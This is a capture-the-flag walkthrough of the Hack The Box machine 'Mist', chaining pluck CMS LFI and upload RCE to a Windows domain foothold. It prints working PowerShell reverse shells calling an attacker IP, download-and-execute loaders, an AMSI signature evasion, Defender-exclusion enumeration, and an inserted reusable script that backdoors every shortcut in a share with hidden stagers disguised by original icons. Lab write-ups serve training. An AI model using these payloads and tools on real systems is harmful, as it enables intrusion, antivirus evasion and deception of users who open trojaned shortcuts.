Mist

1. Information gathering

1.1. Port scan (and a hint of a nested VM)

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# nmap 10.10.11.17 -p- --min-rate 10000      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 03:04 EDT
Nmap scan report for 10.10.11.17
Host is up (0.11s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.69 seconds

┌──(root㉿kali)-[~/Desktop/htb/mist]                    
└─# nmap 10.10.11.17 -p 80 -sCV -vv
Nmap scan report for 10.10.11.17
Host is up, received echo-reply ttl 127 (0.071s latency).
Scanned at 2025-06-02 03:14:07 EDT for 12s

PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 126 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
|_http-generator: pluck 4.7.18
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:14
Completed NSE at 03:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (72B)

Only port 80 is open. The odd detail is the TTL: the SYN-ACK from port 80 arrives with TTL 126.

About the TTL

Windows starts at TTL 128 and every router hop decrements it by one.
On HTB a Windows target normally shows TTL 127: the VPN gateway is the single hop between us and the box.
A TTL of 126 therefore means the reply crossed one more hop than a reply from the box itself would.

Pinging the IP directly gives TTL 127, while the SYN-ACK from port 80 (see the nmap output above, "syn-ack ttl 126") has TTL 126. So the host that answers ICMP is not the host running the web server: port 80 is forwarded to a machine one hop further in, i.e. a VM behind the host we are scanning. From inside that VM we should be able to reach other machines.

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# ping 10.10.11.17
PING 10.10.11.17 (10.10.11.17) 56(84) bytes of data.
64 bytes from 10.10.11.17: icmp_seq=2 ttl=127 time=73.8 ms
64 bytes from 10.10.11.17: icmp_seq=3 ttl=127 time=72.0 ms

2. pluck 4.7.18: chaining two CVEs to RCE

Two CVEs are combined here.

nmap already told us the pluck version from the http-generator tag: 4.7.18.

2.1. LFI

The authenticated (admin panel) RCE for this version is easy to find on GitHub; what we need first is an LFI that hands us the admin password.
Reference: CVE-2024-9405 (arbitrary file read through data/modules/albums/albums_getimage.php).

http://10.10.11.17//data/settings/modules/albums/
Pasted image 20250602154901.png
This directory listing exposes some of the site's files, but they cannot be read directly (the PHP is executed, not returned).
They can be read through the albums module instead: http://10.10.11.17/data/modules/albums/albums_getimage.php?image=<file>
The number printed after the file contents (30 and 146 below) is the file size in bytes, appended by the script; it is not part of the file.

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=mist.php
<?php
$album_name = 'Mist';
?>30                                                                        

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# curl http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php
<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146          

This is most likely SHA-512: pluck keeps the admin password as an unsalted SHA-512 hex digest in $ww (the layout of its data/settings/pass.php, which admin_backup.php mirrors).

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# hash-identifier c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] SHA-512
[+] Whirlpool

Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# echo -n 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e' |wc -c
128  # 128 hex characters = 64 bytes = 512 bits, which matches SHA-512 (hash-identifier cannot tell it apart from Whirlpool, which has the same length)

2.2. Cracking the hash

Pasted image 20250602155817.png
The hash cracks to:
lexypoo97

2.3. Admin-panel RCE

In short: zip a PHP backdoor, then install the archive as a module from the admin panel. pluck unpacks it under data/modules/, so the backdoor ends up reachable over HTTP (the module-install upload is tracked as CVE-2023-50564).

Create the backdoor; I recommend this PHP shell: https://github.com/flozz/p0wny-shell

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# mkdir shell     

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# mv shell.php ./shell

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# zip -r shell.zip ./shell
  adding: shell/ (stored 0%)
  adding: shell/shell.php (stored 0%)

Then open the uploaded shell under http://10.10.14.84/data/modules/shell/ on the target, i.e. http://10.10.11.17/data/modules/shell/<file>.php (the screenshot used p0wnyshell.php; with the zip built above the file is shell.php).
Pasted image 20250602174927.png
But the uploaded files are wiped every 3 minutes, so get a reverse shell quickly.

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Start a listener, then use the webshell to fetch the ps1 from our HTTP server and run it; the output tells us whether it worked.

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev.ps1')

svc_web@MS01:C:\xampp\htdocs\data\modules\shell# powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev.ps1')
IEX : At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software. # blocked here
At line:1 char:1
+ IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

2.4. Bypassing AMSI

AMSI (the Antimalware Scan Interface) hands PowerShell script content to Defender for scanning before it runs. The error above, ScriptContainedMaliciousContent, is exactly what Invoke-Expression raises when that scan flags the script, so AMSI is what blocked our loader.

The signature here matches the well-known one-liner itself, so renaming its variables is enough to slip past it:

# In vim, :%s/old/new/g does the renaming.

# original
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.84',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# renamed
$c = New-Object Net.Sockets.TCPClient('10.10.14.84',1234);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$ssb = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($ssb,0,$ssb.Length);$s.Flush()};$c.Close()

Use a new file name when re-running. rev.ps1 was just blocked, and fetching the same name again may be blocked even with the variables renamed, so the renamed script is served as rev1.ps1.

svc_web@MS01:C:\xampp\htdocs\data\modules\shell# powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.84/rev1.ps1')

Once it runs, rev1.ps1 is downloaded straight into memory and IEX (Invoke-Expression) executes it immediately; nothing is written to disk.

If all goes well, you get a shell.

┌──(root㉿kali)-[~/Desktop/htb/mist]                                        
└─# rlwrap -cAr nc -lvnp 1234
listening on [any] 1234 ...  
connect to [10.10.14.84] from (UNKNOWN) [10.10.11.17] 60396


PS C:\xampp\htdocs\data\modules\shell> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.100.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.100
PS C:\xampp\htdocs\data\modules\shell> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

We have a 192.168.100.0/24 address rather than the 10.10.11.17 we scanned, which confirms the nested VM: the outer host forwards port 80 to this machine. The default gateway 192.168.100.100 is worth remembering for the internal network.

Next, check what AV is running:

PS C:\xampp\htdocs\data\modules\shell> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        76 N/A
smss.exe                       336 N/A
csrss.exe                      452 N/A
csrss.exe                      520 N/A
wininit.exe                    564 N/A
winlogon.exe                   572 N/A
services.exe                   636 N/A
lsass.exe                      648 KeyIso, Netlogon, SamSs
svchost.exe                    744 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
fontdrvhost.exe                768 N/A
fontdrvhost.exe                776 N/A
svchost.exe                    852 RpcEptMapper, RpcSs
LogonUI.exe                    932 N/A
dwm.exe                        944 N/A
svchost.exe                    988 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc,
                                   Schedule, SENS, SessionEnv,
                                   ShellHWDetection, UserManager, UsoSvc,
                                   Winmgmt, WpnService, wuauserv
svchost.exe                    996 TermService
svchost.exe                    392 Dhcp, EventLog, lmhosts, TimeBrokerSvc,
                                   vmictimesync, WinHttpAutoProxySvc
svchost.exe                    440 CDPSvc, DispBrokerDesktopSvc, EventSystem,
                                   FontCache, netprofm, nsi, SstpSvc
svchost.exe                    704 W32Time
svchost.exe                    700 DsSvc, NcbService, PcaSvc, StorSvc,
                                   SysMain, TrkWks, UALSVC, UmRdpService,
                                   vmicguestinterface, vmickvpexchange,
                                   vmicshutdown, vmicvss
svchost.exe                    800 CoreMessagingRegistrar, DPS
svchost.exe                   1044 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, tapisrv, WinRM
svchost.exe                   1112 vmicheartbeat
VSSVC.exe                     1324 VSS
svchost.exe                   1364 BFE, mpssvc
svchost.exe                   1496 Wcmsvc
svchost.exe                   1792 CertPropSvc, RasMan
svchost.exe                   1060 DiagTrack
svchost.exe                    920 LanmanServer
MsMpEng.exe                   1832 WinDefend
svchost.exe                   2340 PolicyAgent
AggregatorHost.exe            2516 N/A
httpd.exe                     2536 ApacheHTTPServer
httpd.exe                     2204 N/A
NisSrv.exe                    3740 WdNisSvc
MicrosoftEdgeUpdate.exe       3856 N/A
msdtc.exe                      580 MSDTC
WmiPrvSE.exe                  1888 N/A 
  • MsMpEng.exe: the core Windows Defender (formerly Microsoft Security Essentials) engine; it does the scanning and real-time protection
  • NisSrv.exe: Defender's Network Inspection Service, which inspects network traffic for exploit attempts

2.5. Finding Defender's excluded directories

To get tooling past Defender, look for excluded directories. The method is from this post:
Peeking Behind the Curtain: Finding Defender's Exclusions – Security Friends' Research Blog

The trick is to enumerate the exclusions from the event log: every change to Defender's configuration is written as Event ID 5007 to the Defender Operational log, which a standard user can still read even though the exclusion list itself is hidden from non-admins on current Defender builds.

PS C:\xampp\htdocs\files> Get-WinEvent -LogName "Microsoft-Windows-Windows Defender/Operational" -FilterXPath "*[System[(EventID=5007)]]" | Where-Object { $_.Message -like "*Exclusions\Paths*" } | Select-Object -Property TimeCreated, Id, Message | Format-List

TimeCreated : 2/25/2024 5:36:45 AM
Id          : 5007
Message     : Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review 
              the settings as this may be the result of malware.
                Old value: 
                New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\xampp\htdocs = 0x0 # there it is: C:\xampp\htdocs is excluded
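As an added example (my code, not part of the original writeup), the one-liner above turned into a reusable check: Get-DefenderExclusionChanges parses every exclusion that was added or removed, Get-DefenderExclusions reduces that to what is excluded right now, and Test-DefenderExclusion drops the EICAR test string into a candidate directory to confirm that real-time protection really leaves the path alone. The registry path, event ID and message layout are the ones in the event shown above; the 10-second wait for real-time protection is an assumption to tune per host.

```powershell
# Added example, not from the original writeup. Parses Defender Event ID 5007 messages of the form
#   New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\xampp\htdocs = 0x0
# (the layout shown in the event above) and checks a candidate path with the EICAR test file.
function Get-DefenderExclusionChanges {
    param([int]$MaxEvents = 1000)

    # group 1: Old|New, group 2: exclusion type (Paths, Extensions, Processes, ...), group 3: the excluded value
    $pattern = '(?m)^\s*(Old|New) value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\(\w+)\\(.+?)\s*=\s*0x[0-9a-fA-F]+\s*$'

    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            foreach ($m in [regex]::Matches($evt.Message, $pattern)) {
                [pscustomobject]@{
                    TimeCreated = $evt.TimeCreated
                    # The value sits under "New value" when the exclusion was added and under
                    # "Old value" when it was removed (the other line is then empty).
                    Action      = if ($m.Groups[1].Value -eq 'New') { 'Added' } else { 'Removed' }
                    Type        = $m.Groups[2].Value
                    Value       = $m.Groups[3].Value
                }
            }
        }
}

function Get-DefenderExclusions {
    # 5007 records changes, not state: the newest change per (Type, Value) decides,
    # and the entry is excluded only if that change added it.
    Get-DefenderExclusionChanges |
        Sort-Object TimeCreated -Descending |
        Group-Object Type, Value |
        ForEach-Object { $_.Group[0] } |
        Where-Object { $_.Action -eq 'Added' } |
        Select-Object Type, Value, TimeCreated
}

function Test-DefenderExclusion {
    param([Parameter(Mandatory)][string]$Path, [int]$WaitSeconds = 10)   # wait time is a guess, tune per host

    # EICAR test string, built from two halves so the script text itself does not trip AMSI on load.
    $eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$' + 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
    $file  = Join-Path $Path ('excl-test-{0}.txt' -f (Get-Random))
    [System.IO.File]::WriteAllText($file, $eicar)
    Start-Sleep -Seconds $WaitSeconds
    # Still present after the wait: real-time protection ignored it, so the path is excluded.
    # Gone: not excluded, and Defender has just logged a detection for this file.
    $excluded = Test-Path $file
    if ($excluded) { Remove-Item $file -Force }
    return $excluded
}

Get-DefenderExclusions | Format-Table -AutoSize
Test-DefenderExclusion -Path 'C:\xampp\htdocs'
```

An exclusion that was added and later removed appears twice in the change list, which is why the newest event per path is taken. The EICAR check is the ground truth, but it is noisy when the path is not excluded: the file is deleted and a detection event is written, so only run it against paths the log already suggests.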

3. The domain

3.1. Malicious LNK

PS C:\users> dir

Directory: C:\users
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          6/2/2025   1:10 AM                Administrator
d-----         2/20/2024   6:02 AM                Administrator.MIST
d-----          6/2/2025   1:10 AM                Brandon.Keywarp
d-r---         2/20/2024   5:44 AM                Public
d-----         2/20/2024   9:39 AM                Sharon.Mullard
d-----          6/2/2025   1:09 AM                svcweb

PS C:\users> net users
User accounts for \\MS01
Administrator            DefaultAccount           Guest
svcweb                  WDAGUtilityAccount
The command completed successfully.

PS C:\users> tree . /f
Folder PATH listing
Volume serial number is 0000013F 560D:8100
C:\USERS
+---Administrator
+---Administrator.MIST
+---Brandon.Keywarp
+---Public
?   +---Documents
?   +---Downloads
?   +---Music
?   +---Pictures
?   +---Videos
+---Sharon.Mullard
+---svc_web
    +---Desktop
    +---Documents
    +---Downloads
    +---Favorites
    +---Links
    +---Music
    +---Pictures
    +---Saved Games
    +---Videos

Several users have profiles on this box. We are ms01\svc_web and can only get into our own profile and Public.

PS C:\> dir


    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2024   1:50 AM                Common Applications
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/20/2024   5:44 AM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         2/21/2024  12:37 PM                Users
d-----         3/26/2024  12:02 PM                Windows
d-----         3/10/2024   3:21 AM                xampp

PS C:\Common Applications> dir

Directory: C:\Common Applications
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/8/2021   1:15 AM           1118 Calculator.lnk
-a----          5/7/2021   3:14 PM           1175 Notepad.lnk
-a----          5/7/2021   3:15 PM           1171 Wordpad.lnk

Looking at the root of C:, an unusual directory stands out: Common Applications, containing nothing but .lnk shortcuts.

PS C:\Common Applications> net view \\ms01
Shared resources at \\ms01



Share name           Type  Used as  Comment  

-------------------------------------------------------------------------------
Common Applications  Disk                    
The command completed successfully.

On top of that the directory is shared over SMB. The guess: some simulated user opens the shortcuts in this share, so we build a malicious LNK and swap it for one of the existing ones.
Reference: Phishing: OLE + LNK | Red Team Notes
Or use this tool: GitHub - Plazmaz/LNKUp: Generates malicious LNK file payloads for data exfiltration

PS C:\Common Applications> $WScriptShell = New-Object -ComObject WScript.Shell
PS C:\Common Applications> $Shortcut = $WScriptShell.CreateShortcut("C:\Common Applications\Wordpad.lnk")
PS C:\Common Applications> $Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS C:\Common Applications> $Shortcut.Arguments = "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.84/rev2.ps1')"
PS C:\Common Applications> $Shortcut.Save()

# contents of rev2.ps1 (the renamed one-liner from before, now calling back to port 4455)
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat rev2.ps1             
$c = New-Object Net.Sockets.TCPClient('10.10.14.84',4455);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$ssb = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($ssb,0,$ssb.Length);$s.Flush()};$c.Close()

http://10.10.14.84/rev2.ps1 serves the reverse-shell script above; this time the listener is on port 4455.
Then wait for the callback.
Pasted image 20250602225743.png
The shortcut gets opened and we receive a reverse shell.
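The snippet above replaces one shortcut by hand. As an added example (my code, not part of the original writeup), here is the same WScript.Shell technique extended to every .lnk in the share: each link keeps its original icon so it looks unchanged to whoever opens it, the PowerShell window is hidden, and the originals are backed up so the share can be restored. It assumes the share path and payload URL used above; the payload runs as whichever account opens a link.

```powershell
# Added example, not from the original writeup. Replaces every shortcut in the shared directory
# with a PowerShell stager while preserving the original icon, and backs up the originals.
function Set-LnkPayload {
    param(
        [string]$ShareDir   = 'C:\Common Applications',          # share path from the writeup
        [string]$PayloadUrl = 'http://10.10.14.84/rev2.ps1',      # attacker URL from the writeup
        [string]$BackupDir  = (Join-Path $env:TEMP 'lnk-backup')
    )

    $wsh = New-Object -ComObject WScript.Shell
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null

    $ps = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
    # -nop: skip profile; -w hidden: no console window; -ep bypass: no execution-policy prompt.
    # ($args is an automatic variable in PowerShell, hence the longer name.)
    $payloadArgs = "-nop -w hidden -ep bypass -c `"IEX(New-Object Net.WebClient).DownloadString('$PayloadUrl')`""

    foreach ($file in Get-ChildItem -Path $ShareDir -Filter *.lnk) {
        Copy-Item -Path $file.FullName -Destination $BackupDir -Force

        # CreateShortcut on an existing .lnk loads it, so the original target can be read
        # before it is overwritten.
        $lnk  = $wsh.CreateShortcut($file.FullName)
        $orig = $lnk.TargetPath

        $lnk.TargetPath  = $ps
        $lnk.Arguments   = $payloadArgs
        $lnk.WindowStyle = 7                               # 7 = minimised: nothing flashes before -w hidden applies
        if ($orig) { $lnk.IconLocation = "$orig,0" }       # keep the icon of calc.exe / notepad.exe / wordpad.exe
        $lnk.Save()

        [pscustomobject]@{ Link = $file.Name; OriginalTarget = $orig; Backup = (Join-Path $BackupDir $file.Name) }
    }
}

# Attacker side, as in the writeup: python3 -m http.server 80 serving rev2.ps1, and rlwrap -cAr nc -lvnp 4455.
Set-LnkPayload | Format-Table -AutoSize
```

To put the share back afterwards, copy the files from the backup directory over the replaced links. Because rev2.ps1 is fetched by the clicking user's PowerShell, it has to be the variable-renamed version from the AMSI section, exactly as the writeup does.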

3.2. BloodHound

That shell runs as the domain user mist\brandon.keywarp.
Upload SharpHound.exe and collect the domain data. Before that, I recommend Stowaway as the shell/proxy tool: it gives us a proxy into the internal network and can upload and download files.

curl http://10.10.14.84/SharpHound.exe -o sharphound.exe
curl http://10.10.14.84/windows_x64_agent.exe -o agent.exe
# collect
PS C:\xampp\htdocs\files> .\sharphound.exe -c all

# start the admin side on Kali, then connect the agent from the box
admin -l 2233
agent.exe -c 10.10.14.84:2233


# download the result
(node 0) >> download 20250602075224_BloodHound.zip 20250602075224_BloodHound.zip
[*] File transmitting, please wait...
36.11 KiB / 36.11 KiB [------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% 118.51 KiB p/s 1s

Pasted image 20250602233558.png
All members of Domain Users can enroll in these templates through Mist-DC01-CA; nothing else stands out for now.

Then add the internal hosts to /etc/hosts:

192.168.100.101 ms01.mist.htb ms01
192.168.100.100 dc01.mist.htb mist.htb dc01

3.3. Brandon.Keywarp's NTLM hash

To make the later steps easier, first obtain the NT hash of Brandon.Keywarp.
Steps:

  • request a certificate as the user (with certipy, or with Certify.exe straight from the shell, since we have a session but no password for the account)
  • convert the certificate with openssl into a PFX that Rubeus accepts
  • use Rubeus to authenticate with the certificate (PKINIT) and recover the NT hash

Stowaway makes it easy to upload the needed binaries.

Run Certify.exe find /enrollable to list the CA and the templates we can enroll in:

Certify.exe find /enrollable

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ __| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mist,DC=htb'

[*] Listing info about the Enterprise CA 'mist-DC01-CA'

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : EFS
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Encrypting File System
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : Administrator
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
